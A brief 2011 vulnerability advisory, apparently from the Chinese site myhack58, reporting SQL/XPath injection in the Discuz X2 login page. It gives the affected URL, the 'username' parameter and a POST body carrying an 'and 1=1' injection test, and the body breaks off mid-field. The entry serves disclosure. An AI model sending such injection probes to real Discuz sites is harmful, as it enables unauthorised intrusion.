Discuz X2 SQL injection/Xpath latest vulnerability-vulnerability warning-the black bar safety net

2011-08-17T00:00:00
ID MYHACK58:62201131604
Type myhack58
Reporter 佚名
Modified 2011-08-17T00:00:00

Description

|

Vulnerability type: SQL injection/Xpath Request method: POST Affected page: http://127.0.0.1/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes Parameters:username Parameters of the test: and 1=1 Attack details: username=1+and+1=1&cookietime=2 5 9 2 0 0 0&password=1&quickforward=yes&handlekey=ls&fastloginfield